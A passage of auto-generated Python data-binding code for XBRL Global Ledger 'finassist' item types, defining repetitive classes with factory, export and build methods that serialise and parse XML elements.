super(accountTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='accountTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='accountTypeItemType', fromsubclass_=False, pretty_print=True):
super(accountTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(accountTypeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class accountTypeItemType
class bookTaxDifferenceItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(bookTaxDifferenceItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if bookTaxDifferenceItemType.subclass:
return bookTaxDifferenceItemType.subclass(*args_, **kwargs_)
else:
return bookTaxDifferenceItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(bookTaxDifferenceItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='bookTaxDifferenceItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='bookTaxDifferenceItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='bookTaxDifferenceItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='bookTaxDifferenceItemType'):
super(bookTaxDifferenceItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='bookTaxDifferenceItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='bookTaxDifferenceItemType', fromsubclass_=False, pretty_print=True):
super(bookTaxDifferenceItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(bookTaxDifferenceItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class bookTaxDifferenceItemType
class identifierOrganizationTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(identifierOrganizationTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if identifierOrganizationTypeItemType.subclass:
return identifierOrganizationTypeItemType.subclass(*args_, **kwargs_)
else:
return identifierOrganizationTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(identifierOrganizationTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='identifierOrganizationTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='identifierOrganizationTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='identifierOrganizationTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='identifierOrganizationTypeItemType'):
super(identifierOrganizationTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='identifierOrganizationTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='identifierOrganizationTypeItemType', fromsubclass_=False, pretty_print=True):
super(identifierOrganizationTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(identifierOrganizationTypeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class identifierOrganizationTypeItemType
class debitCreditCodeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(debitCreditCodeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if debitCreditCodeItemType.subclass:
return debitCreditCodeItemType.subclass(*args_, **kwargs_)
else:
return debitCreditCodeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(debitCreditCodeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='debitCreditCodeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='debitCreditCodeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='debitCreditCodeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='debitCreditCodeItemType'):
super(debitCreditCodeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='debitCreditCodeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='debitCreditCodeItemType', fromsubclass_=False, pretty_print=True):
super(debitCreditCodeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(debitCreditCodeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class debitCreditCodeItemType
class documentTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(documentTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if documentTypeItemType.subclass:
return documentTypeItemType.subclass(*args_, **kwargs_)
else:
return documentTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(documentTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='documentTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='documentTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='documentTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='documentTypeItemType'):
super(documentTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='documentTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='documentTypeItemType', fromsubclass_=False, pretty_print=True):
super(documentTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(documentTypeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class documentTypeItemType
class invoiceTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(invoiceTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if invoiceTypeItemType.subclass:
return invoiceTypeItemType.subclass(*args_, **kwargs_)
else:
return invoiceTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(invoiceTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='invoiceTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='invoiceTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='invoiceTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='invoiceTypeItemType'):
super(invoiceTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='invoiceTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='invoiceTypeItemType', fromsubclass_=False, pretty_print=True):
super(invoiceTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(invoiceTypeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class invoiceTypeItemType
class entriesTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(entriesTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if entriesTypeItemType.subclass:
return entriesTypeItemType.subclass(*args_, **kwargs_)
else:
return entriesTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(entriesTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='entriesTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='entriesTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='entriesTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='entriesTypeItemType'):
super(entriesTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='entriesTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='entriesTypeItemType', fromsubclass_=False, pretty_print=True):
super(entriesTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(entriesTypeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class entriesTypeItemType
class entryTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(entryTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if entryTypeItemType.subclass:
return entryTypeItemType.subclass(*args_, **kwargs_)
else:
return entryTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(entryTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='entryTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='entryTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='entryTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='entryTypeItemType'):
super(entryTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='entryTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='entryTypeItemType', fromsubclass_=False, pretty_print=True):
super(entryTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(entryTypeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class entryTypeItemType
class identifierTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(identifierTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if identifierTypeItemType.subclass:
return identifierTypeItemType.subclass(*args_, **kwargs_)
else:
return identifierTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(identifierTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='identifierTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='identifierTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='identifierTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='identifierTypeItemType'):
super(identifierTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='identifierTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='identifierTypeItemType', fromsubclass_=False, pretty_print=True):
super(identifierTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(identifierTypeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class identifierTypeItemType
class mainAccountTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(mainAccountTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if mainAccountTypeItemType.subclass:
return mainAccountTypeItemType.subclass(*args_, **kwargs_)
else:
return mainAccountTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(mainAccountTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='mainAccountTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='mainAccountTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='mainAccountTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='mainAccountTypeItemType'):
super(mainAccountTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='mainAccountTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='mainAccountTypeItemType', fromsubclass_=False, pretty_print=True):
super(mainAccountTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(mainAccountTypeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class mainAccountTypeItemType
class postingStatusItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(postingStatusItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if postingStatusItemType.subclass:
return postingStatusItemType.subclass(*args_, **kwargs_)
else:
return postingStatusItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(postingStatusItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='postingStatusItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='postingStatusItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='postingStatusItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='postingStatusItemType'):
super(postingStatusItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='postingStatusItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='postingStatusItemType', fromsubclass_=False, pretty_print=True):
super(postingStatusItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(postingStatusItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class postingStatusItemType
class qualifierEntryItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(qualifierEntryItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if qualifierEntryItemType.subclass:
return qualifierEntryItemType.subclass(*args_, **kwargs_)
else:
return qualifierEntryItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(qualifierEntryItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='qualifierEntryItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='qualifierEntryItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='qualifierEntryItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='qualifierEntryItemType'):
super(qualifierEntryItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='qualifierEntryItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='qualifierEntryItemType', fromsubclass_=False, pretty_print=True):
super(qualifierEntryItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(qualifierEntryItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class qualifierEntryItemType
class revisesUniqueIDActionItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(revisesUniqueIDActionItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if revisesUniqueIDActionItemType.subclass:
return revisesUniqueIDActionItemType.subclass(*args_, **kwargs_)
else:
return revisesUniqueIDActionItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(revisesUniqueIDActionItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='revisesUniqueIDActionItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='revisesUniqueIDActionItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='revisesUniqueIDActionItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='revisesUniqueIDActionItemType'):
super(revisesUniqueIDActionItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='revisesUniqueIDActionItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='revisesUniqueIDActionItemType', fromsubclass_=False, pretty_print=True):
super(revisesUniqueIDActionItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(revisesUniqueIDActionItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class revisesUniqueIDActionItemType
class signOfAmountItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(signOfAmountItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if signOfAmountItemType.subclass:
return signOfAmountItemType.subclass(*args_, **kwargs_)
else:
return signOfAmountItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(signOfAmountItemType, self).hasContent_()
):
return True
else:
return False
